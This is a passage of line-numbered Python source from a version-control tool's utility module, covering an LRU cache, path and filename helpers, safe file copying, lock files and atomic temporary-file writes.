1314 1312 # Temporarily mark as newest item before re-adjusting head to make
1315 1313 # this node the oldest item.
1316 1314 self._movetohead(node)
1317 1315 self._head = node.next
1318 1316
1319 1317 # Additional dict methods.
1320 1318
1321 1319 def get(self, k, default=None):
1322 1320 try:
1323 1321 return self._cache[k].value
1324 1322 except KeyError:
1325 1323 return default
1326 1324
1327 1325 def clear(self):
1328 1326 n = self._head
1329 1327 while n.key is not _notset:
1330 1328 n.markempty()
1331 1329 n = n.next
1332 1330
1333 1331 self._cache.clear()
1334 1332
1335 1333 def copy(self):
1336 1334 result = lrucachedict(self._capacity)
1337 1335 n = self._head.prev
1338 1336 # Iterate in oldest-to-newest order, so the copy has the right ordering
1339 1337 for i in range(len(self._cache)):
1340 1338 result[n.key] = n.value
1341 1339 n = n.prev
1342 1340 return result
1343 1341
1344 1342 def _movetohead(self, node):
1345 1343 """Mark a node as the newest, making it the new head.
1346 1344
1347 1345 When a node is accessed, it becomes the freshest entry in the LRU
1348 1346 list, which is denoted by self._head.
1349 1347
1350 1348 Visually, let's make ``N`` the new head node (* denotes head):
1351 1349
1352 1350 previous/oldest <-> head <-> next/next newest
1353 1351
1354 1352 ----<->--- A* ---<->-----
1355 1353 | |
1356 1354 E <-> D <-> N <-> C <-> B
1357 1355
1358 1356 To:
1359 1357
1360 1358 ----<->--- N* ---<->-----
1361 1359 | |
1362 1360 E <-> D <-> C <-> B <-> A
1363 1361
1364 1362 This requires the following moves:
1365 1363
1366 1364 C.next = D (node.prev.next = node.next)
1367 1365 D.prev = C (node.next.prev = node.prev)
1368 1366 E.next = N (head.prev.next = node)
1369 1367 N.prev = E (node.prev = head.prev)
1370 1368 N.next = A (node.next = head)
1371 1369 A.prev = N (head.prev = node)
1372 1370 """
1373 1371 head = self._head
1374 1372 # C.next = D
1375 1373 node.prev.next = node.next
1376 1374 # D.prev = C
1377 1375 node.next.prev = node.prev
1378 1376 # N.prev = E
1379 1377 node.prev = head.prev
1380 1378 # N.next = A
1381 1379 # It is tempting to just use "head" here; however, if node is
1382 1380 # adjacent to head, that would corrupt the list.
1383 1381 node.next = head.prev.next
1384 1382 # E.next = N
1385 1383 node.next.prev = node
1386 1384 # A.prev = N
1387 1385 node.prev.next = node
1388 1386
1389 1387 self._head = node
1390 1388
1391 1389 def _addcapacity(self):
1392 1390 """Add a node to the circular linked list.
1393 1391
1394 1392 The new node is inserted before the head node.
1395 1393 """
1396 1394 head = self._head
1397 1395 node = _lrucachenode()
1398 1396 head.prev.next = node
1399 1397 node.prev = head.prev
1400 1398 node.next = head
1401 1399 head.prev = node
1402 1400 self._size += 1
1403 1401 return node
1404 1402
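# Illustrative sketch (added for illustration, not part of the module):
# lrucachedict eviction order. A read marks a key as freshest, so the
# untouched key is the one recycled when the cache is full.
def _examplelru():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']            # touch 'a'; 'b' is now the oldest entry
    d['c'] = 3        # at capacity: recycles the node holding 'b'
    return 'b' in d   # -> False
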
1405 1403 def lrucachefunc(func):
1406 1404 '''cache most recent results of function calls'''
1407 1405 cache = {}
1408 1406 order = collections.deque()
1409 1407 if func.__code__.co_argcount == 1:
1410 1408 def f(arg):
1411 1409 if arg not in cache:
1412 1410 if len(cache) > 20:
1413 1411 del cache[order.popleft()]
1414 1412 cache[arg] = func(arg)
1415 1413 else:
1416 1414 order.remove(arg)
1417 1415 order.append(arg)
1418 1416 return cache[arg]
1419 1417 else:
1420 1418 def f(*args):
1421 1419 if args not in cache:
1422 1420 if len(cache) > 20:
1423 1421 del cache[order.popleft()]
1424 1422 cache[args] = func(*args)
1425 1423 else:
1426 1424 order.remove(args)
1427 1425 order.append(args)
1428 1426 return cache[args]
1429 1427
1430 1428 return f
1431 1429
1432 1430 class propertycache(object):
1433 1431 def __init__(self, func):
1434 1432 self.func = func
1435 1433 self.name = func.__name__
1436 1434 def __get__(self, obj, type=None):
1437 1435 result = self.func(obj)
1438 1436 self.cachevalue(obj, result)
1439 1437 return result
1440 1438
1441 1439 def cachevalue(self, obj, value):
1442 1440 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1443 1441 obj.__dict__[self.name] = value
1444 1442
1445 1443 def clearcachedproperty(obj, prop):
1446 1444 '''clear a cached property value, if one has been set'''
1447 1445 if prop in obj.__dict__:
1448 1446 del obj.__dict__[prop]
1449 1447
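# Illustrative sketch (added for illustration, not part of the module):
# propertycache computes an attribute once per instance and stores it in
# the instance __dict__, so later lookups bypass the descriptor entirely.
# The class below is hypothetical.
class _examplecached(object):
    @propertycache
    def answer(self):
        return 6 * 7  # runs once; cached as self.__dict__['answer']
# e.g. obj = _examplecached(); obj.answer; clearcachedproperty(obj, 'answer')
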
1450 1448 def increasingchunks(source, min=1024, max=65536):
1451 1449 '''return no less than min bytes per chunk while data remains,
1452 1450 doubling min after each chunk until it reaches max'''
1453 1451 def log2(x):
1454 1452 if not x:
1455 1453 return 0
1456 1454 i = 0
1457 1455 while x:
1458 1456 x >>= 1
1459 1457 i += 1
1460 1458 return i - 1
1461 1459
1462 1460 buf = []
1463 1461 blen = 0
1464 1462 for chunk in source:
1465 1463 buf.append(chunk)
1466 1464 blen += len(chunk)
1467 1465 if blen >= min:
1468 1466 if min < max:
1469 1467 min = min << 1
1470 1468 nmin = 1 << log2(blen)
1471 1469 if nmin > min:
1472 1470 min = nmin
1473 1471 if min > max:
1474 1472 min = max
1475 1473 yield ''.join(buf)
1476 1474 blen = 0
1477 1475 buf = []
1478 1476 if buf:
1479 1477 yield ''.join(buf)
1480 1478
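# Illustrative sketch (added for illustration, not part of the module):
# increasingchunks() coalesces many small chunks into progressively
# larger ones, keeping per-chunk overhead low when streaming.
def _examplechunks():
    source = ('x' * 100 for i in range(10000))  # 10000 tiny pieces
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=8192)]
    # sizes start a little over 1024 and roughly double up to the max
    return sizes
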
1481 1479 def always(fn):
1482 1480 return True
1483 1481
1484 1482 def never(fn):
1485 1483 return False
1486 1484
1487 1485 def nogc(func):
1488 1486 """disable garbage collector
1489 1487
1490 1488 Python's garbage collector triggers a GC each time a certain number of
1491 1489 container objects (the number being defined by gc.get_threshold()) are
1492 1490 allocated even when marked not to be tracked by the collector. Tracking has
1493 1491 no effect on when GCs are triggered, only on what objects the GC looks
1494 1492 into. As a workaround, disable GC while building complex (huge)
1495 1493 containers.
1496 1494
1497 1495 This garbage collector issue has been fixed in 2.7, but it still affects
1498 1496 CPython's performance.
1499 1497 """
1500 1498 def wrapper(*args, **kwargs):
1501 1499 gcenabled = gc.isenabled()
1502 1500 gc.disable()
1503 1501 try:
1504 1502 return func(*args, **kwargs)
1505 1503 finally:
1506 1504 if gcenabled:
1507 1505 gc.enable()
1508 1506 return wrapper
1509 1507
1510 1508 if pycompat.ispypy:
1511 1509 # PyPy runs slower with gc disabled
1512 1510 nogc = lambda x: x
1513 1511
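# Illustrative sketch (added for illustration, not part of the module):
# building a huge container under @nogc avoids repeated collector passes
# triggered purely by the allocation count. The function is hypothetical.
@nogc
def _examplebuildbigmap(n):
    return dict((i, str(i)) for i in range(n))
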
1514 1512 def pathto(root, n1, n2):
1515 1513 '''return the relative path from one place to another.
1516 1514 root should use os.sep to separate directories
1517 1515 n1 should use os.sep to separate directories
1518 1516 n2 should use "/" to separate directories
1519 1517 returns an os.sep-separated path.
1520 1518
1521 1519 If n1 is a relative path, it is assumed to be
1522 1520 relative to root.
1523 1521 n2 should always be relative to root.
1524 1522 '''
1525 1523 if not n1:
1526 1524 return localpath(n2)
1527 1525 if os.path.isabs(n1):
1528 1526 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1529 1527 return os.path.join(root, localpath(n2))
1530 1528 n2 = '/'.join((pconvert(root), n2))
1531 1529 a, b = splitpath(n1), n2.split('/')
1532 1530 a.reverse()
1533 1531 b.reverse()
1534 1532 while a and b and a[-1] == b[-1]:
1535 1533 a.pop()
1536 1534 b.pop()
1537 1535 b.reverse()
1538 1536 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1539 1537
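# Illustrative sketch (added for illustration, not part of the module):
# a few pathto() results, assuming a POSIX os.sep of '/'.
def _examplepathto():
    assert pathto('/repo', 'a/b', 'c/d') == '../../c/d'
    assert pathto('/repo', 'a', 'a/b') == 'b'
    assert pathto('/repo', '', 'c/d') == 'c/d'
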
1540 1538 # the location of data files matching the source code
1541 1539 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1542 1540 # executable version (py2exe) doesn't support __file__
1543 1541 datapath = os.path.dirname(pycompat.sysexecutable)
1544 1542 else:
1545 1543 datapath = os.path.dirname(pycompat.fsencode(__file__))
1546 1544
1547 1545 i18n.setdatapath(datapath)
1548 1546
1549 1547 def checksignature(func):
1550 1548 '''wrap a function with code to check for calling errors'''
1551 1549 def check(*args, **kwargs):
1552 1550 try:
1553 1551 return func(*args, **kwargs)
1554 1552 except TypeError:
1555 1553 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1556 1554 raise error.SignatureError
1557 1555 raise
1558 1556
1559 1557 return check
1560 1558
1561 1559 # a whitelist of known filesystems where hardlinks work reliably
1562 1560 _hardlinkfswhitelist = {
1563 1561 'apfs',
1564 1562 'btrfs',
1565 1563 'ext2',
1566 1564 'ext3',
1567 1565 'ext4',
1568 1566 'hfs',
1569 1567 'jfs',
1570 1568 'NTFS',
1571 1569 'reiserfs',
1572 1570 'tmpfs',
1573 1571 'ufs',
1574 1572 'xfs',
1575 1573 'zfs',
1576 1574 }
1577 1575
1578 1576 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1579 1577 '''copy a file, preserving mode and optionally other stat info like
1580 1578 atime/mtime
1581 1579
1582 1580 checkambig argument is used with filestat, and is useful only if
1583 1581 destination file is guarded by any lock (e.g. repo.lock or
1584 1582 repo.wlock).
1585 1583
1586 1584 copystat and checkambig should be exclusive.
1587 1585 '''
1588 1586 assert not (copystat and checkambig)
1589 1587 oldstat = None
1590 1588 if os.path.lexists(dest):
1591 1589 if checkambig:
1592 1590 oldstat = checkambig and filestat.frompath(dest)
1593 1591 unlink(dest)
1594 1592 if hardlink:
1595 1593 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1596 1594 # unless we are confident that dest is on a whitelisted filesystem.
1597 1595 try:
1598 1596 fstype = getfstype(os.path.dirname(dest))
1599 1597 except OSError:
1600 1598 fstype = None
1601 1599 if fstype not in _hardlinkfswhitelist:
1602 1600 hardlink = False
1603 1601 if hardlink:
1604 1602 try:
1605 1603 oslink(src, dest)
1606 1604 return
1607 1605 except (IOError, OSError):
1608 1606 pass # fall back to normal copy
1609 1607 if os.path.islink(src):
1610 1608 os.symlink(os.readlink(src), dest)
1611 1609 # copytime is ignored for symlinks, but in general copytime isn't needed
1612 1610 # for them anyway
1613 1611 else:
1614 1612 try:
1615 1613 shutil.copyfile(src, dest)
1616 1614 if copystat:
1617 1615 # copystat also copies mode
1618 1616 shutil.copystat(src, dest)
1619 1617 else:
1620 1618 shutil.copymode(src, dest)
1621 1619 if oldstat and oldstat.stat:
1622 1620 newstat = filestat.frompath(dest)
1623 1621 if newstat.isambig(oldstat):
1624 1622 # stat of copied file is ambiguous to original one
1625 1623 advanced = (
1626 1624 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1627 1625 os.utime(dest, (advanced, advanced))
1628 1626 except shutil.Error as inst:
1629 1627 raise error.Abort(str(inst))
1630 1628
1631 1629 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1632 1630 """Copy a directory tree using hardlinks if possible."""
1633 1631 num = 0
1634 1632
1635 1633 gettopic = lambda: hardlink and _('linking') or _('copying')
1636 1634
1637 1635 if os.path.isdir(src):
1638 1636 if hardlink is None:
1639 1637 hardlink = (os.stat(src).st_dev ==
1640 1638 os.stat(os.path.dirname(dst)).st_dev)
1641 1639 topic = gettopic()
1642 1640 os.mkdir(dst)
1643 1641 for name, kind in listdir(src):
1644 1642 srcname = os.path.join(src, name)
1645 1643 dstname = os.path.join(dst, name)
1646 1644 def nprog(t, pos):
1647 1645 if pos is not None:
1648 1646 return progress(t, pos + num)
1649 1647 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1650 1648 num += n
1651 1649 else:
1652 1650 if hardlink is None:
1653 1651 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1654 1652 os.stat(os.path.dirname(dst)).st_dev)
1655 1653 topic = gettopic()
1656 1654
1657 1655 if hardlink:
1658 1656 try:
1659 1657 oslink(src, dst)
1660 1658 except (IOError, OSError):
1661 1659 hardlink = False
1662 1660 shutil.copy(src, dst)
1663 1661 else:
1664 1662 shutil.copy(src, dst)
1665 1663 num += 1
1666 1664 progress(topic, num)
1667 1665 progress(topic, None)
1668 1666
1669 1667 return hardlink, num
1670 1668
1671 1669 _winreservednames = {
1672 1670 'con', 'prn', 'aux', 'nul',
1673 1671 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1674 1672 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1675 1673 }
1676 1674 _winreservedchars = ':*?"<>|'
1677 1675 def checkwinfilename(path):
1678 1676 r'''Check that the base-relative path is a valid filename on Windows.
1679 1677 Returns None if the path is ok, or a UI string describing the problem.
1680 1678
1681 1679 >>> checkwinfilename(b"just/a/normal/path")
1682 1680 >>> checkwinfilename(b"foo/bar/con.xml")
1683 1681 "filename contains 'con', which is reserved on Windows"
1684 1682 >>> checkwinfilename(b"foo/con.xml/bar")
1685 1683 "filename contains 'con', which is reserved on Windows"
1686 1684 >>> checkwinfilename(b"foo/bar/xml.con")
1687 1685 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1688 1686 "filename contains 'AUX', which is reserved on Windows"
1689 1687 >>> checkwinfilename(b"foo/bar/bla:.txt")
1690 1688 "filename contains ':', which is reserved on Windows"
1691 1689 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1692 1690 "filename contains '\\x07', which is invalid on Windows"
1693 1691 >>> checkwinfilename(b"foo/bar/bla ")
1694 1692 "filename ends with ' ', which is not allowed on Windows"
1695 1693 >>> checkwinfilename(b"../bar")
1696 1694 >>> checkwinfilename(b"foo\\")
1697 1695 "filename ends with '\\', which is invalid on Windows"
1698 1696 >>> checkwinfilename(b"foo\\/bar")
1699 1697 "directory name ends with '\\', which is invalid on Windows"
1700 1698 '''
1701 1699 if path.endswith('\\'):
1702 1700 return _("filename ends with '\\', which is invalid on Windows")
1703 1701 if '\\/' in path:
1704 1702 return _("directory name ends with '\\', which is invalid on Windows")
1705 1703 for n in path.replace('\\', '/').split('/'):
1706 1704 if not n:
1707 1705 continue
1708 1706 for c in _filenamebytestr(n):
1709 1707 if c in _winreservedchars:
1710 1708 return _("filename contains '%s', which is reserved "
1711 1709 "on Windows") % c
1712 1710 if ord(c) <= 31:
1713 1711 return _("filename contains '%s', which is invalid "
1714 1712 "on Windows") % stringutil.escapestr(c)
1715 1713 base = n.split('.')[0]
1716 1714 if base and base.lower() in _winreservednames:
1717 1715 return _("filename contains '%s', which is reserved "
1718 1716 "on Windows") % base
1719 1717 t = n[-1:]
1720 1718 if t in '. ' and n not in '..':
1721 1719 return _("filename ends with '%s', which is not allowed "
1722 1720 "on Windows") % t
1723 1721
1724 1722 if pycompat.iswindows:
1725 1723 checkosfilename = checkwinfilename
1726 1724 timer = time.clock
1727 1725 else:
1728 1726 checkosfilename = platform.checkosfilename
1729 1727 timer = time.time
1730 1728
1731 1729 if safehasattr(time, "perf_counter"):
1732 1730 timer = time.perf_counter
1733 1731
1734 1732 def makelock(info, pathname):
1735 1733 """Create a lock file atomically if possible
1736 1734
1737 1735 This may leave a stale lock file if symlink isn't supported and signal
1738 1736 interrupt is enabled.
1739 1737 """
1740 1738 try:
1741 1739 return os.symlink(info, pathname)
1742 1740 except OSError as why:
1743 1741 if why.errno == errno.EEXIST:
1744 1742 raise
1745 1743 except AttributeError: # no symlink in os
1746 1744 pass
1747 1745
1748 1746 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1749 1747 ld = os.open(pathname, flags)
1750 1748 os.write(ld, info)
1751 1749 os.close(ld)
1752 1750
1753 1751 def readlock(pathname):
1754 1752 try:
1755 1753 return os.readlink(pathname)
1756 1754 except OSError as why:
1757 1755 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1758 1756 raise
1759 1757 except AttributeError: # no symlink in os
1760 1758 pass
1761 1759 fp = posixfile(pathname, 'rb')
1762 1760 r = fp.read()
1763 1761 fp.close()
1764 1762 return r
1765 1763
1766 1764 def fstat(fp):
1767 1765 '''stat file object that may not have fileno method.'''
1768 1766 try:
1769 1767 return os.fstat(fp.fileno())
1770 1768 except AttributeError:
1771 1769 return os.stat(fp.name)
1772 1770
1773 1771 # File system features
1774 1772
1775 1773 def fscasesensitive(path):
1776 1774 """
1777 1775 Return true if the given path is on a case-sensitive filesystem
1778 1776
1779 1777 Requires a path (like /foo/.hg) ending with a foldable final
1780 1778 directory component.
1781 1779 """
1782 1780 s1 = os.lstat(path)
1783 1781 d, b = os.path.split(path)
1784 1782 b2 = b.upper()
1785 1783 if b == b2:
1786 1784 b2 = b.lower()
1787 1785 if b == b2:
1788 1786 return True # no evidence against case sensitivity
1789 1787 p2 = os.path.join(d, b2)
1790 1788 try:
1791 1789 s2 = os.lstat(p2)
1792 1790 if s2 == s1:
1793 1791 return False
1794 1792 return True
1795 1793 except OSError:
1796 1794 return True
1797 1795
1798 1796 try:
1799 1797 import re2
1800 1798 _re2 = None
1801 1799 except ImportError:
1802 1800 _re2 = False
1803 1801
1804 1802 class _re(object):
1805 1803 def _checkre2(self):
1806 1804 global _re2
1807 1805 try:
1808 1806 # check if match works, see issue3964
1809 1807 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1810 1808 except ImportError:
1811 1809 _re2 = False
1812 1810
1813 1811 def compile(self, pat, flags=0):
1814 1812 '''Compile a regular expression, using re2 if possible
1815 1813
1816 1814 For best performance, use only re2-compatible regexp features. The
1817 1815 only flags from the re module that are re2-compatible are
1818 1816 IGNORECASE and MULTILINE.'''
1819 1817 if _re2 is None:
1820 1818 self._checkre2()
1821 1819 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1822 1820 if flags & remod.IGNORECASE:
1823 1821 pat = '(?i)' + pat
1824 1822 if flags & remod.MULTILINE:
1825 1823 pat = '(?m)' + pat
1826 1824 try:
1827 1825 return re2.compile(pat)
1828 1826 except re2.error:
1829 1827 pass
1830 1828 return remod.compile(pat, flags)
1831 1829
1832 1830 @propertycache
1833 1831 def escape(self):
1834 1832 '''Return the version of escape corresponding to self.compile.
1835 1833
1836 1834 This is imperfect because whether re2 or re is used for a particular
1837 1835 function depends on the flags, etc, but it's the best we can do.
1838 1836 '''
1839 1837 global _re2
1840 1838 if _re2 is None:
1841 1839 self._checkre2()
1842 1840 if _re2:
1843 1841 return re2.escape
1844 1842 else:
1845 1843 return remod.escape
1846 1844
1847 1845 re = _re()
1848 1846
1849 1847 _fspathcache = {}
1850 1848 def fspath(name, root):
1851 1849 '''Get name in the case stored in the filesystem
1852 1850
1853 1851 The name should be relative to root, and be normcase-ed for efficiency.
1854 1852
1855 1853 Note that this function is unnecessary, and should not be
1856 1854 called, for case-sensitive filesystems (simply because it's expensive).
1857 1855
1858 1856 The root should be normcase-ed, too.
1859 1857 '''
1860 1858 def _makefspathcacheentry(dir):
1861 1859 return dict((normcase(n), n) for n in os.listdir(dir))
1862 1860
1863 1861 seps = pycompat.ossep
1864 1862 if pycompat.osaltsep:
1865 1863 seps = seps + pycompat.osaltsep
1866 1864 # Protect backslashes. This gets silly very quickly.
1867 1865 seps = seps.replace('\\', '\\\\')
1868 1866 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1869 1867 dir = os.path.normpath(root)
1870 1868 result = []
1871 1869 for part, sep in pattern.findall(name):
1872 1870 if sep:
1873 1871 result.append(sep)
1874 1872 continue
1875 1873
1876 1874 if dir not in _fspathcache:
1877 1875 _fspathcache[dir] = _makefspathcacheentry(dir)
1878 1876 contents = _fspathcache[dir]
1879 1877
1880 1878 found = contents.get(part)
1881 1879 if not found:
1882 1880 # retry "once per directory" per "dirstate.walk" which
883 881 # may take place for each patch of "hg qpush", for example
1884 1882 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1885 1883 found = contents.get(part)
1886 1884
1887 1885 result.append(found or part)
1888 1886 dir = os.path.join(dir, part)
1889 1887
1890 1888 return ''.join(result)
1891 1889
1892 1890 def checknlink(testfile):
1893 1891 '''check whether hardlink count reporting works properly'''
1894 1892
1895 1893 # testfile may be open, so we need a separate file for checking to
1896 1894 # work around issue2543 (or testfile may get lost on Samba shares)
1897 1895 f1, f2, fp = None, None, None
1898 1896 try:
1899 1897 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1900 1898 suffix='1~', dir=os.path.dirname(testfile))
1901 1899 os.close(fd)
1902 1900 f2 = '%s2~' % f1[:-2]
1903 1901
1904 1902 oslink(f1, f2)
1905 1903 # nlinks() may behave differently for files on Windows shares if
1906 1904 # the file is open.
1907 1905 fp = posixfile(f2)
1908 1906 return nlinks(f2) > 1
1909 1907 except OSError:
1910 1908 return False
1911 1909 finally:
1912 1910 if fp is not None:
1913 1911 fp.close()
1914 1912 for f in (f1, f2):
1915 1913 try:
1916 1914 if f is not None:
1917 1915 os.unlink(f)
1918 1916 except OSError:
1919 1917 pass
1920 1918
1921 1919 def endswithsep(path):
1922 1920 '''Check path ends with os.sep or os.altsep.'''
1923 1921 return (path.endswith(pycompat.ossep)
1924 1922 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1925 1923
1926 1924 def splitpath(path):
1927 1925 '''Split path by os.sep.
1928 1926 Note that this function does not use os.altsep because it is
1929 1927 meant as an alternative to a simple "xxx.split(os.sep)".
1930 1928 It is recommended to use os.path.normpath() before using this
1931 1929 function if needed.'''
1932 1930 return path.split(pycompat.ossep)
1933 1931
1934 1932 def mktempcopy(name, emptyok=False, createmode=None):
1935 1933 """Create a temporary file with the same contents from name
1936 1934
1937 1935 The permission bits are copied from the original file.
1938 1936
1939 1937 If the temporary file is going to be truncated immediately, you
1940 1938 can use emptyok=True as an optimization.
1941 1939
1942 1940 Returns the name of the temporary file.
1943 1941 """
1944 1942 d, fn = os.path.split(name)
1945 1943 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1946 1944 os.close(fd)
1947 1945 # Temporary files are created with mode 0600, which is usually not
1948 1946 # what we want. If the original file already exists, just copy
1949 1947 # its mode. Otherwise, manually obey umask.
1950 1948 copymode(name, temp, createmode)
1951 1949 if emptyok:
1952 1950 return temp
1953 1951 try:
1954 1952 try:
1955 1953 ifp = posixfile(name, "rb")
1956 1954 except IOError as inst:
1957 1955 if inst.errno == errno.ENOENT:
1958 1956 return temp
1959 1957 if not getattr(inst, 'filename', None):
1960 1958 inst.filename = name
1961 1959 raise
1962 1960 ofp = posixfile(temp, "wb")
1963 1961 for chunk in filechunkiter(ifp):
1964 1962 ofp.write(chunk)
1965 1963 ifp.close()
1966 1964 ofp.close()
1967 1965 except: # re-raises
1968 1966 try:
1969 1967 os.unlink(temp)
1970 1968 except OSError:
1971 1969 pass
1972 1970 raise
1973 1971 return temp
1974 1972
1975 1973 class filestat(object):
1976 1974 """help to exactly detect change of a file
1977 1975
1978 1976 'stat' attribute is result of 'os.stat()' if specified 'path'
1979 1977 exists. Otherwise, it is None. This can avoid preparative
1980 1978 'exists()' examination on client side of this class.
1981 1979 """
1982 1980 def __init__(self, stat):
1983 1981 self.stat = stat
1984 1982
1985 1983 @classmethod
1986 1984 def frompath(cls, path):
1987 1985 try:
1988 1986 stat = os.stat(path)
1989 1987 except OSError as err:
1990 1988 if err.errno != errno.ENOENT:
1991 1989 raise
1992 1990 stat = None
1993 1991 return cls(stat)
1994 1992
1995 1993 @classmethod
1996 1994 def fromfp(cls, fp):
1997 1995 stat = os.fstat(fp.fileno())
1998 1996 return cls(stat)
1999 1997
2000 1998 __hash__ = object.__hash__
2001 1999
2002 2000 def __eq__(self, old):
2003 2001 try:
2004 2002 # if ambiguity between stat of new and old file is
2005 2003 # avoided, comparison of size, ctime and mtime is enough
2006 2004 # to exactly detect change of a file regardless of platform
2007 2005 return (self.stat.st_size == old.stat.st_size and
2008 2006 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2009 2007 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2010 2008 except AttributeError:
2011 2009 pass
2012 2010 try:
2013 2011 return self.stat is None and old.stat is None
2014 2012 except AttributeError:
2015 2013 return False
2016 2014
2017 2015 def isambig(self, old):
2018 2016 """Examine whether new (= self) stat is ambiguous against old one
2019 2017
2020 2018 "S[N]" below means stat of a file at N-th change:
2021 2019
2022 2020 - S[n-1].ctime < S[n].ctime: can detect change of a file
2023 2021 - S[n-1].ctime == S[n].ctime
2024 2022 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2025 2023 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2026 2024 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2027 2025 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2028 2026
2029 2027 Case (*2) above means that a file was changed twice or more
2030 2028 within the same second (= S[n-1].ctime), so comparing
2031 2029 timestamps alone is ambiguous.
2032 2030
2033 2031 The basic idea for avoiding such ambiguity is to "advance mtime
2034 2032 by 1 sec, if the timestamp is ambiguous".
2035 2033
2036 2034 But advancing mtime only in case (*2) doesn't work as
2037 2035 expected, because naturally advanced S[n].mtime in case (*1)
2038 2036 might be equal to manually advanced S[n-1 or earlier].mtime.
2039 2037
2040 2038 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2041 2039 treated as ambiguous regardless of mtime, to avoid changes
2042 2040 being overlooked due to colliding mtimes.
2043 2041
2044 2042 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2045 2043 S[n].mtime", even if the size of the file hasn't changed.
2046 2044 """
2047 2045 try:
2048 2046 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2049 2047 except AttributeError:
2050 2048 return False
2051 2049
2052 2050 def avoidambig(self, path, old):
2053 2051 """Change file stat of specified path to avoid ambiguity
2054 2052
2055 2053 'old' should be previous filestat of 'path'.
2056 2054
2057 2055 This skips the ambiguity avoidance and returns False if the
2058 2056 process doesn't have appropriate privileges for 'path'.
2059 2057 
2060 2058 Otherwise, this returns True, as the ambiguity has been
2061 2059 avoided.
2062 2060 """
2063 2061 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2064 2062 try:
2065 2063 os.utime(path, (advanced, advanced))
2066 2064 except OSError as inst:
2067 2065 if inst.errno == errno.EPERM:
2068 2066 # utime() on the file created by another user causes EPERM,
2069 2067 # if a process doesn't have appropriate privileges
2070 2068 return False
2071 2069 raise
2072 2070 return True
2073 2071
2074 2072 def __ne__(self, other):
2075 2073 return not self == other
2076 2074
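# A minimal sketch of filestat around a rewrite of a lock-guarded file
# ('_demo_rewrite' is a hypothetical helper; writefile() is defined later
# in this module).
def _demo_rewrite(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # the rewrite landed within the same ctime second; nudge mtime
        # so that later comparisons can still detect the change
        newstat.avoidambig(path, oldstat)
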
2077 2075 class atomictempfile(object):
2078 2076 '''writable file object that atomically updates a file
2079 2077
2080 2078 All writes will go to a temporary copy of the original file. Call
2081 2079 close() when you are done writing, and atomictempfile will rename
2082 2080 the temporary copy to the original name, making the changes
2083 2081 visible. If the object is destroyed without being closed, all your
2084 2082 writes are discarded.
2085 2083
2086 2084 The checkambig argument of the constructor is used with filestat,
2087 2085 and is useful only if the target file is guarded by a lock
2088 2086 (e.g. repo.lock or repo.wlock).
2089 2087 '''
2090 2088 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2091 2089 self.__name = name # permanent name
2092 2090 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2093 2091 createmode=createmode)
2094 2092 self._fp = posixfile(self._tempname, mode)
2095 2093 self._checkambig = checkambig
2096 2094
2097 2095 # delegated methods
2098 2096 self.read = self._fp.read
2099 2097 self.write = self._fp.write
2100 2098 self.seek = self._fp.seek
2101 2099 self.tell = self._fp.tell
2102 2100 self.fileno = self._fp.fileno
2103 2101
2104 2102 def close(self):
2105 2103 if not self._fp.closed:
2106 2104 self._fp.close()
2107 2105 filename = localpath(self.__name)
2108 2106 oldstat = self._checkambig and filestat.frompath(filename)
2109 2107 if oldstat and oldstat.stat:
2110 2108 rename(self._tempname, filename)
2111 2109 newstat = filestat.frompath(filename)
2112 2110 if newstat.isambig(oldstat):
2113 2111 # stat of the changed file is ambiguous relative to the original
2114 2112 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2115 2113 os.utime(filename, (advanced, advanced))
2116 2114 else:
2117 2115 rename(self._tempname, filename)
2118 2116
2119 2117 def discard(self):
2120 2118 if not self._fp.closed:
2121 2119 try:
2122 2120 os.unlink(self._tempname)
2123 2121 except OSError:
2124 2122 pass
2125 2123 self._fp.close()
2126 2124
2127 2125 def __del__(self):
2128 2126 if safehasattr(self, '_fp'): # constructor actually did something
2129 2127 self.discard()
2130 2128
2131 2129 def __enter__(self):
2132 2130 return self
2133 2131
2134 2132 def __exit__(self, exctype, excvalue, traceback):
2135 2133 if exctype is not None:
2136 2134 self.discard()
2137 2135 else:
